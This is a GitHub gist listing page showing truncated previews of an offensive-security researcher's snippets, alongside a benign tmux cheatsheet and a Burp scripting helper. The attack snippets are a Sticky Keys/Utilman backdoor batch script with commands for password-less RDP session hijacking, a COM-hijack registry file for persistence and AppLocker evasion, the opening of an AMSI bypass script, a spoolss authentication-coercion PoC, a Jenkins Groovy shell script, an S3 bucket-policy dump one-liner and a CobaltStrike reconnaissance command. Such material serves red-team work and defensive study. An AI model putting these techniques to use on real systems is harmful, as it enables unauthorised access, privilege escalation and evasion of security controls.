Skip to content

Instantly share code, notes, and snippets.

💭
Offensive Sencha Consultant

Mariusz B. mgeeky

💭
Offensive Sencha Consultant
Block or report user

Report or block mgeeky

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@mgeeky
mgeeky / Decode-Base64.ps1
Last active Jun 20, 2019
Base64 Decode in Powershell
View Decode-Base64.ps1
function Decode-Base64Ascii ($data) {
$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
$ss = "[^" + $chars + "=]"
$data = $data -replace $ss, ""
$pad = ""
$r = ""
if (($data[$data.Length - 1]) -eq '=') {
if (($data[$data.Length - 2]) -eq '=') {
$pad = "AA"
@mgeeky
mgeeky / sethc-utilman-backdoor.bat
Last active Jun 19, 2019
Utilman and Sethc (Sticky keys) ready for use backdoor script. Deadly when used with "Password-less RDP Session Hijacking" trick
View sethc-utilman-backdoor.bat
@echo off
REM Backdoors sethc.exe (Sticky keys) and utilman (Win+U) in order to easily get past
REM Windows logon screen (GINA). These processes will launch as SYSTEM. We can use then
REM technique dubbed as "Password-less RDP Session Hijacking", by doing:
REM (parameters to tscon needs to be adjusted)
REM C:\> query user
REM C:\> sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:console"
REM C:\> net start sesshijack
REM
@mgeeky
mgeeky / dementor.py
Created Jun 14, 2019 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
View dementor.py
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@mgeeky
mgeeky / pyscripter_utils.py
Created Jun 14, 2019 — forked from lanmaster53/pyscripter_utils.py
Burp Python Scripter scripts
View pyscripter_utils.py
from burp import IScanIssue
class CustomIssue(IScanIssue):
def __init__(self, BasePair, Confidence='Certain', IssueBackground=None, IssueDetail=None, IssueName='Python Scripter generated issue', RemediationBackground=None, RemediationDetail=None, Severity='High'):
self.HttpMessages=[BasePair] # list of HTTP Messages
self.HttpService=BasePair.getHttpService() # HTTP Service
self.Url=BasePair.getUrl() # Java URL
self.Confidence = Confidence # "Certain", "Firm" or "Tentative"
self.IssueBackground = IssueBackground # String or None
self.IssueDetail = IssueDetail # String or None
@mgeeky
mgeeky / slmgr-com-hijack.reg
Last active Jul 13, 2019
Example presenting how to Hijack COM object named "Scripting.Dictionary" used by slmgr.vbs (CreateObject("Scripting.Dictionary")) in order to obtain persistence or evade Command Line logging and AppLocker
View slmgr-com-hijack.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
@mgeeky
mgeeky / Disable-Amsi.ps1
Last active Jun 14, 2019
Hash-Lookups based three most recent AMSI Bypasses, techniques 1 and 3 works at the moment (13.06.2019).
View Disable-Amsi.ps1
#requires -version 5
function New-InMemoryModule
{
Param
(
[Parameter(Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$ModuleName = [Guid]::NewGuid().ToString()
@mgeeky
mgeeky / s3-dump-bucket-policies.sh
Created May 28, 2019
One-liner that dumps all of the S3 buckets from different regions and all their Bucket policies.
View s3-dump-bucket-policies.sh
P=aws-profile; for region in `aws ec2 describe-regions --output text | cut -f3`; do for bucket in `aws --region $region --profile $P s3api list-buckets --query 'Buckets[*].Name' --output text | tr '\t' '\n'`; do aws --profile $P --region $region s3api get-bucket-policy --bucket $bucket --query 'Policy' --output text 2> /dev/null | jq '.' | tee $P-$bucket.json ; done ; done
View tmux-cheatsheet.markdown

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@mgeeky
mgeeky / cobaltstrike-argue-powershell.txt
Created Apr 26, 2019
CobaltStrike's argue command with parameters for "powershell" command.
View cobaltstrike-argue-powershell.txt
argue powershell Get-WmiObject -Class ccm_application -Namespace root\ccm\clientsdk -ComputerName (get-content C:\Windows\System32\drivers\etc\hosts) | Where-Object { ($_.InstallState -ne "Installed") -and ($_.ApplicabilityState -eq "Applicable") -and ($_.IsMachineTarget -eq $True) -and ($_.EvaluationState -ne 1)} | select FullName,__SERVER ; Get-WMIobject win32_networkadapterconfiguration | where {$_.IPEnabled -eq “True”} | Select-Object pscomputername,ipaddress,defaultipgateway,ipsubnet,dnsserversearchorder,winsprimaryserver | format-Table -Auto ; Get-EventLog -log system -newest 1000 | where-object {$_.eventid -eq '1074'} | format-table machinename, username, timegenerated -autosize
@mgeeky
mgeeky / jenkins-groovy-script-shell.txt
Last active Jun 21, 2019
Jenkins Groovy Shell-providing script. To be used after passing authentication on http://IP:Port/script
View jenkins-groovy-script-shell.txt
def shell(String command) {
println command
def process = new ProcessBuilder(addShellPrefix(command))
.directory(new File(System.properties.'user.dir'))
.redirectErrorStream(true)
.start()
process.inputStream.eachLine {println it}
process.waitFor();
return process.exitValue()
}
You can’t perform that action at this time.